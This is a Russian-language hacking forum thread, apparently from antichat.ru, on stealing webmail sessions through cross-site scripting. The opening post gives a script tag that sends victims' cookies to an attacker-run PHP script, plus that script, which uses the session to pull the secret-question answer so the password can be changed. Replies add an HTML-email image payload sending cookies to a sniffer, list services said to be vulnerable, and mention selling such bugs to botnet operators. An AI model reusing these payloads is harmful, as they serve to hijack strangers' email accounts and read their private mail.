Как выяснилось фильтров там вообще никаких нет, ну или покрайне мере я их там не нашёл :)))
Для идентификации пользователей сервер использует id(в переменной cookie) или если id не обноружен, то куки. Причём идентификатор сесии СОВПАДАЕТ с переменной "AGMail" в cookies.
Впринципе нам достаточно получить только куки пользователя и подделов их попасть в его ящик, но это сработате только если пользователь не нажал кнопку "выход"
=> напишем скрипт, который отсылает cookies на скрипт(причём данный скрипт работает не только в IE, но и в других броузерах поддерживающих javascript:
<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>
Поскольку ответ на секретный вопрос храниться в открытом виде, напишем ещё один скрипт на php, который сохраняет нам страницу "Информация о пользователе" где он и присутствует:

<?
$nachalo=strpos("$QUERY_STRING","AGMail=")+7; // ищем номер позиции с которой начинается cookie
$cooka=substr("$QUERY_STRING","$nachalo"); // сохраняем cookie в переменную $cooka
$p=join('',file("http://email.ru/scripts/options?user=1&site=rol&cookie={$cooka}")); // читаем информацию о пользователе и загоняем её в переменную $p
$f=Fopen("./{$cooka}.html","w") or die("ale!!!!!!!!!"); // открывает канал для записи
fputs($f,$p); // записываем переменную $p
fputs($f,$QUERY_STRING); // на странице "Информация о пользователе" нет адреса жертвы, но он есть в куках, потому также запишим их в этот фал на всякий случай :)
fclose($f); // закрываем канал
?>

Потом идём вместе с секретным вопросом и меняем пароль на мыло !
P.S. По этому же принцепу можно читать чужую почту, записав свой адрес на перенапрвыление почты...

1 чето не сработало!
а в 2 как применить?
Просто отправить по почте или на сайт загрузить?

1 чето не сработало!
а в 2 как применить?
Просто отправить по почте или на сайт загрузить?
Первый скрипт от правляешь по почте в виде html письма
Второй заливаешь на сайт(бесплатный хостинг не подойдёт так как там запрешены исходяшие линки)

1 я понял (я думал на mail.ru это работает )) )!
А вот 2 чето не понятно...
$p=join - это ник чтоли?
user=1 - и как я узнаю ид мыла...

1 я понял (я думал на mail.ru это работает )) )!
А вот 2 чето не понятно...
$p=join - это ник чтоли?
user=1 - и как я узнаю ид мыла...
&cookie={$cooka} - эт ид
$p=join - это функция которая читает страницу

Красавец! Но на mail.ru тэг <script> фильтруется и заменяется на <xscript>... так что думаем дальше...

вообще для mail.ru , просто посылаещь http://antichat.ru/cgi-bin/s.jpg? и ждещь когда зайдут по этой ссылке , и на снифе появиться сесия атакуемого , просто вставляешь идешь по его ссылке (что в снифере появилась ) и все ты у него на почте ":))
конечно это наверно все знают .....

а вот офигенный сайтик http://unknown-.chat.ru/page5.html прочтите ":))

да, и ссылку можно замаскировать , просто он открывает письмо и она само срабатывает

Попробовал на своём почтовом ящике, и получил к нему доступ... вот ведь теперь бояться надо себя! :cool:

С уважением,
Илья.

Я считаю, что даная статья является заблуждением её автора.
Каждый сайт оставляет на "машинах" пользователей свои кукисы, тоесть: если мы на сайте вставляем строку alert(document.cookie) мы увидим кукисы те, которые мы сами туда записали, а отнюдь не кукисы с сайта почтовой системы. Данная статья будет актуальна и функциональна в случае, если эта строка, укзананная в статье: "<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>" записана в страницу почтовой системы. Если Вы вставили эту строку в свой сайт и надеетесь таким путём прочесть кукис, который сохранила одна из почтовых систем, то у Вас конечно же ничего не выйдет. Таким образом вы всего лишь прочтёте кукисы, которые сами впихнули юзверю. Надеюсь моя мысль понятна.

я писал ранее о неработоспособности данного примера.
Приношу свои извинения авторам и сайту.
Я увидел на одном из сайтов в инете этот пример просто вставленный в штмл, именно это и ввело меня в заблуждение.
Ещё раз сорри!

PS Наглядным примером работы почтовой системы вообще без куков, является почта на e-mail.ru

На:
pochta.ru, front.ru, fromru.com, hotbox.ru, krovatka.net, land.ru, mail15.com, mail333.com, pisem.net, pochtamt.ru, pop3.ru, rbcmail.ru, smtp.ru 1`й вариант тоже работает)))

На:
pochta.ru, front.ru, fromru.com, hotbox.ru, krovatka.net, land.ru, mail15.com, mail333.com, pisem.net, pochtamt.ru, pop3.ru, rbcmail.ru, smtp.ru 1`й вариант тоже работает)))
нууу, нет конешно, там как минимум надо хеш-пароль иметь чтоб этим воспользоваться

нууу, нет конешно, там как минимум надо хеш-пароль иметь чтоб этим воспользоваться
Не, попробуй отправить письмо с вложеным html документом в котором будит этот код:
<img src="javascript:img=new Image();img.src='http://сниффер/me.jpg?cooki='+escape(document.cookie)">
Правда есть минус один - как только юзверь из почты выходит все накрываеться(((

Не, попробуй отправить письмо с вложеным html документом в котором будит этот код:
<img src="javascript:img=new Image();img.src='http://сниффер/me.jpg?cooki='+escape(document.cookie)">
Правда есть минус один - как только юзверь из почты выходит все накрываеться(((
это почти на всех почтах так...., этож не зават ящика ..

pojaluysta podrobney opishite na schet pervogo primere na mail.ru
zaranye pasiba

слушайте, а насколько актуальна статья в настоящее время?
имею ввиду дырки эти уже прикрыли??

Это ыт уже заебал на флудил нету ХСС на маил.ру а тем более для тебя! Если ты спрашиваешь как закодировать код. То я не думаю что ты ХСС нашёл.

А так же могу сказать но не точно ХСС на маил.ру за стоко не продаётся! Она стоит чуть ли не 100 баксов. Так что я тебе не верю.

2SanyaX ты чего какой сто баксов?? мну стал бы богатым+))))) :D за бесплатно могу в общаг вынести ;) (чтоб все не думали - бага отличается от той что нашел Dronga поэтому моя гыгы)
pantilxaker расслабься - для этого есть раздел обьявления
---
ЗЫ LittleLamer выкладывал в общаг хсс на яндесе чуется стоит не меньше а ведь выложил+)

ЗЫ LittleLamer выкладывал в общаг хсс на яндесе чуется стоит не меньше а ведь выложил+)Не, просто это Че с похмелья чистил ГМ и случайно переместил. )
А насчет XSS, поверь, Я общался с чеоловеком, который их сборщикам ботнетов по 50 баксов толкал. Само собой это был необычный пассиы хрен знает где.

Не надо на майл.ру Xss на паблик ложить... Ато пофиксят имхо (((

P.s. Розовая Пантера, уменьши подпись )))

Люди, а этот трюк действует на народе (жертва@yandex.ru, жертва@ya.ru, жертва@narod.ru)?
:)
-----------
люди, я чёто не понял, куда сохраняются куки? :confused:

Нет, на яндексе фильтры....

А куда куки сохраняются?

Упёртые?
На сниффер приходят.

Я чёто не заметил в скрипте ссылку на сниффер.